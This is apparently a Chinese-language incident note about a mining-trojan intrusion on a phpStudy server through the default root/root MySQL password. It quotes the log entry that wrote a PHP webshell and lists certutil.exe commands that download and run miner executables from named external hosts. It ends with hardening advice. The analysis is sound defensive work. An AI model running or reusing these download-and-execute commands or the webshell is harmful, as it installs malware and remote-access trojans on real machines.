今天客戶服務器上出現報警,查找了下原因,發現根目錄下有wk.php
E:\phpStudy\MySQL\bin\mysqld.exe, Version: 5.5.53 (MySQL Community Server (GPL)). started with: TCP Port: 3306, Named Pipe: MySQL Time Id Command Argument 2173 Quit 190207 18:31:59 2174 Connect root@localhost on 2174 Query SET NAMES 'utf8' COLLATE 'utf8_general_ci' 2174 Init DB mysql 2174 Init DB mysql 2174 Query SELECT '<?php @system("certutil.exe -urlcache -split -f http://m4.rui2.net/upload/12/2016/10/wk.exe");@phpinfo();@system("certutil.exe -urlcache -split -f http://14.29.194.121:22/server_sql.php");@sleep(2);@system('wk.exe');?>' 2174 Query SHOW VARIABLES LIKE 'language' 2174 Quit 190207 18:32:00 2175 Connect root@localhost on 2175 Query SET NAMES 'utf8' COLLATE 'utf8_general_ci' 2175 Init DB mysql 2175 Init DB mysql 2175 Query set global general_log='off'
查了下原因,是針對phpStudy網站服務器進行批量入侵的挖礦木馬
攻擊者對互聯網上的服務器進行批量掃描,發現易受攻擊的phpStudy系統后,利用用戶在安裝時未進行修改的MySQL弱密碼進行登錄,並進一步植入WebShell,然后通過shell下載挖礦木馬挖門羅幣。
中招主機通過phpStudy一鍵部署PHP環境,默認情況下包含phpinfo及phpMyAdmin並且任何人都可以訪問,同時安裝的MySQL默認口令為弱口令密碼root/root,且開啟在外網3306端口,在未設置安全組或者安全組為放通全端口的情況下,受到攻擊者對於phpStudy的針對性探測,並且暴露了其MySQL弱口令。
特點:
(1)都是通過探測phpStudy搭建的php環境進行攻擊
(2)通過webshell植入挖礦木馬時,白利用certutil.exe
命令1
certutil.exe -urlcache -split -f http://down.ctosus.ru/wkinstall.exe &wkinstall.exe &del wkinstall.exe
命令2
certutil.exe -urlcache -split -f http://m4.rui2.net/upload/12/2016/10/wk.exe &wk.exe
(3)挖礦木馬通過bat腳本啟動,且礦機采用xmr-stak挖礦工具
(4)在挖礦的同時植入大灰狼遠控木馬
安全建議:
(1)修復系統漏洞
(2)集成環境,在安裝結束后應及時修改MySQL密碼為強密碼,最低密碼長度不要低於11位,組合最好是字母數字和符號;刪除l.php(探針文件),避免被黑客探測入侵
(3)增加安全策略
參考:https://s.tencent.com/research/report/642.html